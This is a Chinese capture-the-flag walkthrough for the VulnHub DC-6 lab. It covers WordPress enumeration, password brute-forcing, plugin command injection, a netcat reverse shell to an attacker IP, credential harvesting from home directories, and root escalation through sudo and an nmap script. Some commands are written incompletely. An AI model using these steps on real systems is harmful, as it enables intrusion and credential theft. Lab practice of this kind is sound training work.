一、環境搭建
1、官網下載連接:https://www.vulnhub.com/entry/dc-6,315/
2、下載之后,使用Oracle VM VirtualBox導入靶場環境
3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可
二、靶場攻略
1、依照慣例,使用命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,快速探測存活主機,找到靶場ip
2、使用命令:nmap -A -p- 10.10.114.36,探測存活端口,發現22端口和80端口開啟
3、訪問80端口,因為會直接跳轉到wordy界面,所以在hosts文件中添加ip地址,才能正常訪問
4、因為網站頁腳有提示,知道為wordpress搭建,所以嘗試wpscan進行掃描
使用命令:wpscan --url wordy -e u,掃描獲得網站用戶名
5、因為wpscan沒找到可利用的插件漏洞,只能嘗試爆破,使用密碼為官網提示的密碼
使用提示的命令cat /usr/share/wordlists/rockyou.txt | grep k01 > password ,得到一個密碼字典
6、訪問http://wordy/wp-login.php,使用Burpsuite抓包進行登錄爆破,獲得一個賬號mark,密碼helpdesk01
7、在插件中,找到一個存在漏洞的插件Activity monitor
根據漏掃說明,在插件的tools界面,存在命令執行漏洞,可以利用進行反彈shell
使用BP進行抓包,在ip參數后加入要執行的命令,成功執行,說明漏洞點沒問題
使用命令:nc -e 10.10.114.186 2345,成功接收到反彈的shell
8、輸入命令:python -c "import pty;pty.spawn('/bin/bash')",得到一個交互shell
使用命令:ls -alhR /home,列出/home目錄下的所有文件,發現幾個隱私文件
查看隱私文件,發現賬號密碼
使用得到的密碼,然后ssh進行登錄,成功登錄
9、使用命令:sudo -l,發現無密碼使用的命令為jens目錄下的backups.sh命令
10、使用vi 命令,將原來的backups.sh腳本內容,修改為
/bin/sh
echo 'os.execute("/bin/bash")' > root.nse
之后使用命令:sudo -u jens /home/jens/backups.sh,運行腳本,得到jens權限的shell
之后使用命令:sudo nmap -script=root.nse,用script執行后觸發/bin/bash得到root權限,成功提權到root,並獲得flag
完